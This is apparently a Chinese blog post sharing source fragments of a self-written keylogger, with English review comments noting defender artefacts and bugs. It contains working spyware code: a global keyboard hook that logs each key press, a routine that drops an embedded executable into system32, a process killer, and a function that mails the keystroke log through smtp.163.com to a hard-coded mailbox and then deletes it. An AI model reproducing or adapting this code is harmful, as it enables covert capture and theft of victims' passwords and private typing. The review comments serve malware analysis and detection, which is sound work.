功能如下,运行后自动隐藏界面,然后记录键盘,每隔30分钟会向预先设定的邮箱发一封记录邮件,功能还不是很完善。我就不把程序放上来了,就贴几段源代码吧。
1.TerminateProcessByName //根据进程名称结束指定进程
// Terminates running processes whose executable name equals processName
// (case-insensitive, via CString::CompareNoCase). It walks a Toolhelp32
// process snapshot and calls TerminateProcess on each match.
//
// As written, neither the snapshot handle nor any opened process handle is
// passed to CloseHandle, and the function returns at the first matching
// process that OpenProcess cannot open, so later matches are not visited.
//
// NOTE(review): the caller and the target process names are not shown on this
// page. For triage, the observable behaviour is a process enumerating the
// process list and opening other processes with PROCESS_ALL_ACCESS before
// terminating them.
void TerminateProcessByName(CString processName)
{
HANDLE snapShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//--------------------------------------
// Enumerate processes
//--------------------------------------
PROCESSENTRY32 processInfo;
CString strProcessName= "";
DWORD nProcessID=0;
HANDLE processHandle;
int nProcessTerminate=0;
// dwSize must be set before Process32First is called.
processInfo.dwSize=sizeof(PROCESSENTRY32);
// Fetch the first process entry
BOOL status=Process32First(snapShot,&processInfo);
while(status)
{
// Executable name of the current entry
strProcessName = processInfo.szExeFile;
// Is this the process that was requested to be ended?
if(processName.CompareNoCase(strProcessName)==0)
{
// Process ID of the match
nProcessID=processInfo.th32ProcessID;
// Requests every access right, although only terminate access is used below.
processHandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, nProcessID );
if(processHandle==NULL)
{
// Open failed: the whole scan is abandoned here.
return;
}
// End the process with exit code 0
TerminateProcess(processHandle,0);
}
// Advance to the next process entry
status=Process32Next(snapShot,&processInfo);
}
}
2. 实现指定资源文件的拷贝 //这段代码解决了全局钩子必须使用动态链接库这个问题
// Writes an embedded resource (ID 141, custom type "Exe") from the running
// module out to C:\WINDOWS\system32\picture.exe, overwriting any existing
// file (CREATE_ALWAYS). No return value is checked at any step, and
// writeSize is declared outside this fragment.
//
// NOTE(review): per the page's heading, this extracted file is the author's
// workaround for the rule that a global hook must live in a DLL; how it is
// launched is not shown. For defenders, the host artefacts are a new
// executable appearing under system32 written by a non-installer process,
// and a PE carrying a second executable in a custom resource type.
HANDLE hFile = CreateFile(
"C:\\WINDOWS\\system32\\picture.exe",
GENERIC_WRITE,FILE_SHARE_WRITE,NULL,
CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
// Locate the embedded payload in this module's resources.
HRSRC hrsrc=FindResource(NULL,MAKEINTRESOURCE(141),"Exe");
// Load the resource and take a pointer to its bytes.
LPCVOID lp=LockResource(LoadResource(NULL,hrsrc));
DWORD fileSize=SizeofResource(NULL,hrsrc);
// Write the resource bytes to the target file in a single call.
WriteFile(hFile,lp,fileSize,&writeSize,NULL);
CloseHandle(hFile);
3.SendMyMail //发送邮件
// Prototypes for two functions imported from an external DLL, which is not
// named on this page. SendMail takes the SMTP server, account credentials,
// sender, recipient, subject and body as C strings. GetSmtpError is declared
// here but not called anywhere in the visible code.
// NOTE(review): the imported mail DLL is an extra dependency of the sample
// and a useful import/static-analysis pivot — confirm which library it is.
BOOL _declspec(dllimport) WINAPI SendMail(
LPCSTR smtpserver,
LPCSTR user,
LPCSTR password,
LPCSTR mailfrom,
LPCSTR mailto,
LPCSTR subject,
LPCSTR msgbody
);
BOOL _declspec(dllimport) WINAPI GetSmtpError(LPSTR strerrmsg);
// Reads up to 2000 bytes of the keystroke log file, mails them through
// SendMail using hard-coded SMTP account details (masked on this page), then
// deletes the log file.
//
// No return value is checked (fopen, fread, SendMail, remove), so the log is
// deleted even if the send failed. buffer is never initialised or
// NUL-terminated before being used as the message body.
//
// NOTE(review): defender-relevant artefacts visible here are the fixed log
// path under system32, the subject string "The log for keyboard", outbound
// SMTP to smtp.163.com from a desktop process, and mailbox credentials
// embedded as plain string literals in the binary (recoverable by static
// string extraction, which identifies the collecting account).
void SendMyMail()
{
// "a+" creates the file if it does not exist yet.
FILE* f=fopen("C:\\WINDOWS\\system32\\logforkeyboard.db","a+");
char buffer[2002];
// At most 2000 bytes are read; anything beyond that is dropped when the
// file is removed below.
fread(buffer,sizeof(char),2000,f);
fclose(f);
// Hard-coded SMTP server, account, password, sender and recipient.
char* stserver="smtp.163.com";
char* user="***********";
char* pwd="**********";
char* sender="***********";
char* receiver="********@qq.com";
char* title="The log for keyboard";
char* body=buffer;
SendMail(stserver,user,pwd,sender,receiver,title,body);
// The log is removed unconditionally after the send attempt.
remove("C:\\WINDOWS\\system32\\logforkeyboard.db");
}
4.KeyboardProc //关键的函数,键盘记录
// Keyboard hook callback: records one character per key press and forwards
// every event to the next hook in the chain.
//
// - 'U' with bit 29 of lParam set (the ALT context-code bit for keyboard hook
//   messages) sends WM_CLOSE to g_hWnd and removes the hook; this is the
//   author's built-in off switch.
// - Events with bit 30 of lParam set (key was already down before this
//   message, i.e. auto-repeat and key release) are forwarded without logging.
// - Every other event is translated by getKeyText and handed to
//   WriteToDbFile; both are defined elsewhere in the project.
//
// The code parameter is forwarded but never inspected here.
//
// NOTE(review): the call that installs this hook is not on this page; the
// heading's mention of a global hook suggests SetWindowsHookEx with a
// keyboard hook type, which is the API event to look for in endpoint
// telemetry — confirm against the full sample. WriteToDbFile presumably
// appends to the log file that SendMyMail reads; verify.
LRESULT CALLBACK KeyboardProc(
int code, // hook code
WPARAM wParam, // virtual-key code
LPARAM lParam // keystroke-message information
)
{
// ALT+U: close the hidden window and unhook.
if('U'==wParam&&(1==(lParam>>29 & 1)))
{
SendMessage(g_hWnd,WM_CLOSE,0,0);
UnhookWindowsHookEx(g_hKeyboard);
}
// Previous-key-state bit set: not an initial key-down, so pass it on unlogged.
if (lParam& 0x40000000)
{
return CallNextHookEx(g_hKeyboard,code,wParam,lParam);
}
else
{
// Initial key-down: map the virtual-key code to a character and log it.
char c=getKeyText(wParam);
WriteToDbFile(c);
}
return CallNextHookEx(g_hKeyboard,code,wParam,lParam);
}